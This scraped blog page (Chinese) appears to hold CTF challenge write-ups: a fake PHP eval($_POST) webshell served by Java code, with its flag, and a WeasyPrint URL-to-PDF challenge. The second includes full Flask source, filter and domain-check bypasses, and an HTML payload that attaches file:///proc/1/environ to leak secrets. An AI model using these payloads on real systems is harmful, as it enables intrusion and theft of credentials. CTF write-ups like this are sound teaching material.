当前位置：首页 > news >正文

泰州做网站价格网站建设费摊销处理

news 2025/9/16 6:16:22

泰州做网站价格,网站建设费摊销处理,腾讯云 wordpress建站,电脑自己做网站可以吗真亦假，假亦真简介：java伪造php一句话马。实则信息泄露一扫就出，flag在/flag里面。题目描述：开开心心签个到吧，祝各位师傅们好运~ 静态flag：NSS{Checkin_h4v3_4_g00D_tINNe!} /路由显示 <?php e…

真亦假，假亦真

简介：java伪造php一句话马。实则信息泄露一扫就出，flag在/flag里面。

题目描述：开开心心签个到吧，祝各位师傅们好运~

静态flag：NSS{Checkin_h4v3_4_g00D_tINNe!}

/路由显示

<?php
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);//标准一句话木马~
eval($_POST[1]);
?>

docker build -t toftoffff . && docker run -d --name=toftoffff -p 9029:9029 --rm toftoffff

WP：

开题

做好事不留名，那我Jay17当然不干好事啦

你不会真去getshell了吧，不会吧不会吧

其实这只是Java伪造的一句话，源码：

package org.nss.nss_true_boot01;import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;@RestController
public class TestController {@GetMapping("/")@ResponseBodypublic String index() {return "<!DOCTYPE html>" +"<html>" +"<head><title>签到题题题</title></head>" +"<body>" +"<h1>" +"签到题，直接送大家shell了，做好事不留名，我叫Jay17（6s后页面跳转）<br>" +"</h1>" +"<script>" +"setTimeout(function() {" +"    window.location.href = '/shell.php';" +"}, 6000);" +"</script>" +"</body>" +"</html>";}@GetMapping("/shell.php")public String shell(){String htmlContent = "<!DOCTYPE html>" +"<html>" +"<body>" +"<code><span style=\"color: #000000\">" +"<span style=\"color: #0000BB\">&lt;?</span><span style=\"color: #DD0000\">php</span><br />" +"error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +"<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +"'Content-Type:&nbsp;text/html;&nbsp;charset=utf-8'</span><span style=\"color: #007700\">);" +"<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +"__FILE__</span><span style=\"color: #007700\">);" +"<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +"<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +"</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +"<br /></span><span style=\"color: #0000BB\">?&gt;</span>" +"</span>" +"</code>" +"</body>" +"</html>";return htmlContent;}@PostMapping("/shell.php")public String shellhhhh(){String htmlContent = "<!DOCTYPE html>" +"<html>" +"<body>" +"<code><span style=\"color: #000000\">" +"<span style=\"color: #0000BB\">&lt;?</span><span style=\"color: #DD0000\">php</span><br />" +"error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +"<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +"'Content-Type:&nbsp;text/html;&nbsp;charset=utf-8'</span><span style=\"color: #007700\">);" +"<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +"__FILE__</span><span style=\"color: #007700\">);" +"<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +"<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +"</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +"<br /></span><span style=\"color: #0000BB\">?&gt;</span>" +"</span>" +"</code>" +"真是shell我能给你？"+"</body>" +"</html>";return htmlContent;}@GetMapping("/flag")public String flag(){return "真是shell我能给你？不过flag真给你，师傅们玩的愉快~：NSS{Checkin_h4v3_4_g00D_tINNe!}";}}

如何破局？其实假的一句话木马我有给hint，我故意调错了颜色

同时，flag路由扫一下就出来了。

CSDN_To_PDF V1.2

简介：python WeasyPrint 的漏洞，之前出现过：[FireshellCTF2020]URL TO PDF（BUU）、2023羊城杯决赛（未公开环境）。我进行过二开，加大了一点难度，可以从代码逻辑缺陷入手绕过

hint：

WeasyPrint

必须包含blog.csdn.net

会过滤替换字符串html

文件夹名字可以是blog.csdn.net

题目描述：几年前的自用版CSDN博客PDF转换器

源码：

from flask import Flask, request, jsonify, make_response, render_template, flash, redirect, url_for
import re
from flask_weasyprint import HTML, render_pdf
import osapp = Flask(__name__)URL_REGEX = re.compile(r'http(s)?://'r'(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
)def is_valid_url(url):if not URL_REGEX.match(url):return Falseif "blog.csdn.net" not in url:return Falsereturn True@app.route('/', methods=['GET', 'POST'])
def CsdnToPdf():if request.method == 'POST':url = request.form.get('url')url = url.replace("html", "")if is_valid_url(url):try:html = HTML(url=url)pdf = html.write_pdf()response = make_response(pdf)response.headers['Content-Type'] = 'application/pdf'response.headers['Content-Disposition'] = 'attachment; filename=output.pdf'return responseexcept Exception as e:return f'Error generating PDF', 500else:return f'Invalid URL! Target web address: ' + urlelse:return render_template("index.html"), 200if __name__ == '__main__':app.run(host='0.0.0.0', port=8080)

docker build -t csdntopdf . && docker run -d -p 9030:8080 --name csdntopdf -e FLAG=NSSCTF{test_flag} --rm double_pickle

WP：

开题：

源码不知道需不需要给，算了不给了，你们搞黑盒吧，hint都有。

hint如下，能不能发现看大家啦：

1、url不符合要求的话，会返回Invalid URL! Target web address:xxxxx，可以发现我吧字符串html替换为空，双写绕过就行

2、题目提到了CSDN博客PDF转换器，所以url必须包含blog.csdn.net，看起来无法绕过，但是你看看源码就懂了，前端源码我有给hint，我的css文件用的是：http://120.46.41.173/Jay17/blog.csdn.net/templates/index.css，服务器上有个文件夹是不是叫blog.csdn.net，就这样绕，有想法的师傅可能还能在我的vps同目录下发现源码哦~

3、功能是转换成PDF，后端是python。不难想到是WeasyPrint ，这是一个 Python 的虚拟 HTML 和 CSS 渲染引擎，可以用来将网页转成 PDF 文档。旨在支持 Web 标准的打印

原题wp可以看看y4✌的：[BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客

首先探测一下漏洞：

http://120.46.41.173:9023/blog.csdn.net

vps上文件test.html

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///proc/1/environ">
</body>
</html>

我们利用python WeasyPrint 的方法是：

payload:

http://vps-ip/link.html

这题利用方法：

payload：

http://120.46.41.173/Jay17/blog.csdn.net/link.hthtmlml

拿到PDF后，binwalk -e 文件名

赛题测试：

查看全文

http://www.yayakq.cn/news/130271/

网站如何添加百度商桥淘宝导购网站建设

珠海科技网站建设提交网站的入口地址

js做论坛网站国产的主题wordpress

扬州网站建设网站天眼查公司信息查询

设计网站账号不忘初心继续前进网站怎么做

梓潼县住房和城乡建设局网站重庆微信网站建设报价表

百度推广送的公司网站有什么用网页设计制作网站模板图片

厦门建设公司网站网站标题可以修改吗

网页网站设计公司有哪些开发区全力做好网站建设

遂宁网站建设略奥网络wordpress在线文档

暖色网站WordPress 删除字段

广东网站建设公司报价wordpress程序怎么搬家

WordPress网站仿制wordpress去掉index

聊城住房建设局网站做三个月网站广告收入

网站建设分几类关于网站建设的技巧

做服装公司需要什么网站专业网站建设哪家更好

网站添加视频代码php wordpress乱码

河南免费网站建设哪家好网络教育全程托管

崇信门户网站留言回复怎么建设一个区块链资讯网站

做设计学什么英语比较好的网站湖南涟钢建设有限公司网站

网站建设解决建设工程专注在哪个网站

青岛网站运营推广企业的oa管理系统

家具网站开发给网站做网站

网站建设公司工资设置阿里云轻量服务器wordpress

怎么做网站服务器吗wordpress评论优化

真亦假，假亦真

CSDN_To_PDF V1.2

相关文章：